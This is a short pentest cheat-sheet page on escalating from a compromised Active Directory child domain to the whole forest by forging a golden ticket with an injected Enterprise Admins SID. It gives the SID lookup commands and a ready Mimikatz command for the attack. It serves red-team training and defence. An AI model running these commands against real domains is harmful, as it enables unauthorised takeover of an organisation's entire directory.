trust-sid-hijacking.md (1263B)
1 --- 2 title: "Child Domain to Forest Compromise - SID Hijacking" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/trust-sid-hijacking.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/trust-sid-hijacking.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Child Domain to Forest Compromise - SID Hijacking 12 13 Most trees are linked with dual sided trust relationships to allow for sharing of resources. 14 By default the first domain created if the Forest Root. 15 16 **Requirements**: 17 18 - KRBTGT Hash 19 - Find the SID of the domain 20 21 ```powershell 22 $ Convert-NameToSid target.domain.com\krbtgt 23 S-1-5-21-2941561648-383941485-1389968811-502 24 25 # with Impacket 26 lookupsid.py domain/user:password@10.10.10.10 27 ``` 28 29 - Replace 502 with 519 to represent Enterprise Admins 30 31 **Exploitation**: 32 33 - Create golden ticket and attack parent domain. 34 35 ```powershell 36 kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt 37 ``` 38 39 ## References 40 41 - [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)